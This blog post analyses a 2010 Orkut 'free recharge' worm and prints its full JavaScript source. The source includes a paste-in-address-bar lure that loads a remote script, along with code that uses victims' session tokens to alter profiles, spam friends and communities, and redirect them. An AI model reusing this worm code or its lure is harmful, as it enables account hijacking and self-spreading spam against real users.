Another Orkut bug....

During mid Feb, I saw this bug that was recurrently mutating into new forms, yet the original code remained awfully similar. I think orkut had blocked processing of all that is html in their posts for a few days untill the issue was resloved.

I managed to make a local copy of that source in order to find out what it was really trying to do...
And as usual , firebug was a great help in making things rather discreet and easy to see...

The code made social engg request targeted to mobile users, offering them "fake-recharge " for life worths time, and in truth it added those guys who clicked into a predecided community, and posted comments on albums(of the victim).

<br /> alert("Wait For 5 Minutes We are getting recharge for you");<br /> var assuntox, mensagemx, b, vixrulz;<br /> var assuntox = "READ :: ORKUT/GOOGLE OFFICIAL UPDATE 2010 ::";<br /> var mensagemx = "[b]-> [maroon]TRICK TO GET FREE CELLPHONE RECHARGE[/maroon][b] <-[B][/b]\n\n\n[b][navy]1)[/navy][/green] First, Copy the code below that is written in [red]RED[/red]\n.\n[u]Code[/u] :-\n\n\[b][red][b][red]java[red]script[/red][red]:d[/red]=document[red];c=d.create[/red]Element[red](%22script%22)[/red][red];d[/red].[red]body[/red].[red]appendChild(c)[/red];c[red].[/red]src[red]=%22ht%22+%22tp:%22+%22//su%22+%22.%22+%22ly%22+%22/%22+%222oE%22;void(0)[/b][/red]\n\n[b][navy]2)[/navy] Paste This Code In The Address Bar ( where you write www.orkut...) and Press [b][u][red]ENTER[/b][/u][/red]\n.\n[b][navy]3)[/navy]Enter Your Number And Press Ok To All Messages That Come!\n.\n[b][navy]4)[/navy]Now wait 5 minutes And refresh Your webbrowser To Verify Balance!.\n.\n[purple]If You Like It pass to your friends To Get [u][green]MORE RECHARGE!\n\n\n [silver]" + Math.floor(Math.random() * 999999); var b = "I LEFT COMMENT ON YOUR ALBUM ABOUT A FREE RECHARGE!!\n\nI WILL TELL HOW IT WORKS [b][blue]Azul:\n\n[b][red]java[red]script[/red][red]:d[/red]=document[red];c=d.create[/red]Element[red](%22script%22)[/red][red];d[/red].[red]body[/red].[red]appendChild(c)[/red];c[red].[/red]src[red]=%22ht%22+%22tp:%22+%22//su%22+%22.%22+%22ly%22+%22/%22+%222oE%22;void(0)[/b][/blue]\n\nCopy It And paste in Address Bar where you write [B]WWW.[/B]\Now It Will Open!\n\nPass It to your friends Too to get more free tricks,\nThen enjoy the recharge.\n\nIf It doesnt works , tell me i will help"; var vixrulz = "\n\n[B] Hi Guys This Is The Official Update By Google India For 2010! \n\n According To It , If You Are An Orkut User , You Will Get 333 Cell Recharge Free On Your Cell From Google As A New Year Gift! I Got it Already! \n\n To Get It :- \n\n. [red]Go To My [U]PROFILE[/U][RED][B] And Check My [U]ABOUT ME[/U] To Get The Update! [:)] \n\n [blue]THANK YOU!\n\n [orange]GOOGLE/ORKUT? OFFICIAL UPDATE 2010 \n\n"; try { document.title = ":::PROCESSING RECHARGE:::"; function createXMLHttpRequest() { return window.ActiveXObject ? new ActiveXObject("Msxml2.XMLHTTP") : new XMLHttpRequest; } var about = createXMLHttpRequest(); about.open("POST", "EditSocial", false); about.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"); about.send("POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&kids=1&ethnicity=0&religion=0&political=0&humor.submitted=1&sexPref=1&sexPrefPrivacy=3&fashion.submitted=1&smoking=1&drinking=0&pets=0&living.submitted=1&hometown=&webpageUrl=&aboutMe=" + encodeURIComponent(mensagemx) + "&passions=&sports=&activities=&books=&music=&shows=&movies=&cuisines=&Action.update=Enviar+dados"); var status = createXMLHttpRequest(); status.open("POST", "Profile", false); status.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"); status.send("POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&userStatus=" + encodeURIComponent('[B]CHECK MY PROFILE FOR FREE CELLPHONE RECHARGE') + "&Action.editUserStatusMessage=1"); function getFL(a) { var b = createXMLHttpRequest(); b.open("GET", "/RequestFriends.aspx?req=fl&uid=" + a + "&oxh=1&rnd=" + Math.random(), false); b.send(null); if (b.status == 200) { eval("var jSON=" + b.responseText.split("while (true); &&&START&&&")[1] + ";"); manageFriends(jSON); } } function manageFriends(a) { var b = a.data.list; var c = b.length > 10 ? 10 : b.length;<br /> getAid(b, 0);<br /> }<br /><br /><br /> function getAid(a, n) {<br /> var b = a.length;<br /> if (n == b) {<br /> return;<br /> }<br /> var c = createXMLHttpRequest();<br /> var d = a[Math.round(Math.random() * (a.length - 1))].id;<br /> c.open("GET", "/AlbumList.aspx?uid=" + d, false);<br /> c.send(null);<br /> if (c.status == 200) {<br /> var e = c.responseText.match(/aid=(\d+)/i);<br /> if (e) {<br /> e = e[1];<br /> getPid(d, e);<br /> }<br /> }<br /> n++;<br /> getAid(a, n);<br /> }<br /><br /><br /> function getPid(a, b) {<br /> var c = createXMLHttpRequest();<br /> c.open("GET", "/Album.aspx?uid=" + a + "&aid=" + b, false);<br /> c.send(null);<br /> if (c.status == 200) {<br /> var d = c.responseText.match(/&(amp;)?pid=(\d+)/i);<br /> if (d) {<br /> postComment(a, b, d[2]);<br /> }<br /> }<br /> }<br /><br /><br /> function postComment(a, b, c) {<br /> var d = "com=" + encodeURIComponent("HEY NICE PHOTO AND PLEASE JOIN MY COMMUNITY! GO HERE http://www.orkut.co.in/Main#Community?cmm=91440938") + "&POST_TOKEN=" + JSHDF['CGI.POST_TOKEN'] + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&Action.addComment=&aid=" + b + "&uid=" + a + "&pid=" + c + "&ploc=&oxh=1";<br /> xml = createXMLHttpRequest();<br /> xml.open("POST", "/AlbumZoom", false);<br /> xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");<br /> xml.send(d);<br /> sendScrap(a);<br /> }<br /><br /><br /> function sendScrap(a) {<br /> var c = "Action.submit=1&scrapText=" + encodeURIComponent("[red]Hey Friend I Left A Comment On Your Album Check It Out\nAnd Please Accept The Testimonial That I Sent You , It Really Works! \n: ") + Math.floor(Math.random() * 91839067) + "&POST_TOKEN=" + JSHDF['CGI.POST_TOKEN'] + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&uid=" + a;<br /> var d = createXMLHttpRequest();<br /> d.open("POST", "/Scrapbook.aspx", false);<br /> d.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");<br /> d.send(c);<br /> depo(a);<br /> }<br /><br /><br /> function depo(a) {<br /> var b = mensagemx;<br /> var c = "Action.submit&countedTextbox=" + encodeURIComponent(b) + "&POST_TOKEN=" + JSHDF['CGI.POST_TOKEN'] + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&uid=" + a;<br /> var xxt = createXMLHttpRequest();<br /> xxt.open("POST", "/TestimonialWrite.aspx", false);<br /> xxt.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");<br /> xxt.send(c);<br /> }<br /><br /> function RodrigoScrap(a) {<br /> var c = "Action.submit=1&scrapText=" + encodeURIComponent('[b]..[/b] [b]Godsend ') + Math.floor(Math.random() * 91839067) + "&POST_TOKEN=" + JSHDF['CGI.POST_TOKEN'] + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&uid=" + a;<br /> var d = createXMLHttpRequest();<br /> d.open("POST", "/Scrapbook.aspx", false);<br /> d.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");<br /> d.send(c);<br /> depo(a);<br /> }<br /><br /> function show_me() {<br /> alert("Wait While Recharge Is Done");<br /> alert("Refresh the page after 3 minutes!!");<br /> }<br /><br /><br /> function cmm(a) {<br /> var b = "POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&Action.join";<br /> var c = createXMLHttpRequest();<br /> c.open("POST", "/CommunityJoin.aspx?cmm=" + a, false);<br /> c.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");<br /> c.send(b);<br /> }<br /><br /><br /> function Pamela(a) {<br /> var bbb = ["blue", "RED", "GREEN", "GRAY", "GREEN", "VIOLET", "YELLOW", "BLUE"];<br /> var color = Math.floor(Math.random() * bbb.length);<br /> var Danilo = ["Got It Sir , Thanks! [:)]","It Is Busy , I will try again! [:(] Thanks!"];<br /> var Miedi = Math.floor(Math.random() * Danilo.length);<br /> var up = "[b]THIS TOPIC IS [" + bbb[color] + "]UP!![/" + bbb[color] + "][/b] It's Still Working [;)] " + Danilo[Miedi] + " \n ..... [silver]" + Math.floor(Math.random() * 95234511);<br /> var b = "POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&bodyText=" + encodeURIComponent(up) + "&Action.submit";<br /> var c = createXMLHttpRequest();<br /> c.open("POST", "/CommMsgPost.aspx?cmm=" + a, false);<br /> c.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");<br /> c.send(b);<br /> }<br /><br /><br /> function GetCmms() {<br /> var xml2 = createXMLHttpRequest();<br /> xml2.open("GET", "/Communities", false), xml2.send(null);<br /> var cmmx = xml2.responseText.match(/cmm=\d+/gi);<br /> return cmmx;<br /> }<br /><br /> var cmmx = GetCmms();<br /><br /> function Envia(a, d, e) {<br /> var b = "POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&subjectText=" + encodeURIComponent(d) + "&bodyText=" + encodeURIComponent(e) + "[silver]" + Math.floor(Math.random() * 999) + "&Action.submit";<br /> var c = createXMLHttpRequest();<br /> c.open("POST", "/CommMsgPost.aspx?" + a, false);<br /> c.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");<br /> c.send(b);<br /> }<br /><br /> try {<br /> Envia(cmmx[1], assuntox, vixrulz);<br /> Envia(cmmx[2], assuntox, vixrulz);<br /> Envia(cmmx[4], assuntox, vixrulz);<br /> Envia(cmmx[5], assuntox, vixrulz);<br /> Envia(cmmx[6], assuntox, vixrulz);<br /> Envia(cmmx[7], assuntox, vixrulz);<br /> Envia(cmmx[8], assuntox, vixrulz);<br /> Envia(cmmx[9], assuntox, vixrulz);<br /> Envia(cmmx[10], assuntox, vixrulz);<br /> } catch (e) {<br /> bunda = e;<br /> }<br /><br /> function Abre_CoCaCoLa(a) {<br /> var alerta = alert("ust 3 Minutes More\n- Recharge Server is Down\n- Due To High Demand..\n\n");<br /> }<br /><br /><br /> function depo(a) {<br /> var c = "Action.submit&countedTextbox=" + encodeURIComponent(mensagemx) + "&POST_TOKEN=" + JSHDF['CGI.POST_TOKEN'] + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&uid=" + a;<br /> var xxt = createXMLHttpRequest();<br /> xxt.open("POST", "/TestimonialWrite.aspx", false);<br /> xxt.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");<br /> xxt.send(c);<br /> }<br /><br /><br /> function noob() {<br /> alert("Recharge SMS Send , Refresh the page after 2 minutes!");<br /> var myDCC = window.orkutFrame ? window.orkutFrame.document : document;<br /> var UID = myDCC.body.innerHTML.match(/uid=(\d+)/i)[1];<br /> var Lay = myDCC.body.innerHTML += "";<br /> getFL(UID);<br /> }<br /><br /><br /> function setCookie(a, b, c, d, e, f) {<br /> var g = a + "=" + escape(b) + (c ? "; expires=" + c.toGMTString() : "") + (d ? "; path=" + d : "") + (e ? "; domain=" + e : "") + (f ? "; secure" : "");<br /> document.cookie = g;<br /> }<br /><br /><br /> function getCookie(a) {<br /> var b = document.cookie;<br /> var c = a + "=";<br /> var d = b.indexOf("; " + c);<br /> if (d == -1) {<br /> d = b.indexOf(c);<br /> if (d != 0) {<br /> return false;<br /> }<br /> } else {<br /> d += 2;<br /> }<br /> var e = document.cookie.indexOf(";", d);<br /> if (e == -1) {<br /> e = b.length;<br /> }<br /> return unescape(b.substring(d + c.length, e));<br /> }<br /><br /> show_me();<br /> cmm(91440938);<br /> cmm(91440938);<br /> cmm(91440938);<br /><br /><br /> Pamela('91440938&tid=5437963316068002956&start=1');<br /> noob();<br /> if (!getCookie("say")) {<br /> var wDate = new Date;<br /> wDate.setTime(wDate.getTime() + 864000);<br /> setCookie("say", "1", wDate);<br /> }<br /> }catch(ex){}<br />setTimeout(function(){alert('Recharge done , Check Your Balance , And Your Profile Has Been Edited By Us , If You Want More Recharge , Dont Change Your Profile As It Is Advertisement And Is Neccessary!'); window.location.replace('http://cli.gs/0rkuts3xx'); }, 200);<br /><br />

I maintain a fake profile on orkut from which I do all such things , and I tested this one from it. Now it does work but I wonder how did the creator of this bug find out the exact parameters google's orkut webapp requires in order to successfully process the request ?

Its because of internal details like this, that I believe this guy would have worked on it internally at some point in time. And now that orkut is full of heare and there, its all the more difficult to see whats going on exactly whithout having access to the actual source that spwan those frames.

Asynch request /reply has definitely made the web all the more interesting .....

As a part of my grad coursework, I had demonstrated how flash can be used to override the browser's same origin policy (since flash works on flash's policy ,which is set by website owners,its not fixed like the browsers's same origin policy)...

It basically translates to this: If I have ability to upload an swf movie on your trusted domain, your pretty much screwed(if u run it, and you will, cause that is what social engg will make you do) !

:)

Lately I am busy doing this project on particle simulation, its awesome project , in which I basically try to do about a billion particles simulation in real time. So this field is rather unrelated to security as such, although its my second favorite topic "optimization".

Optimization problems are always interesting in a variety of ways, they basically mess with your brain so much that your consumed by searching for possibilities....and then mathematical tools come to your rescue telling you that you have wasted all your time in-vain , searching for a desert rose....

^_^

Till later, see ya!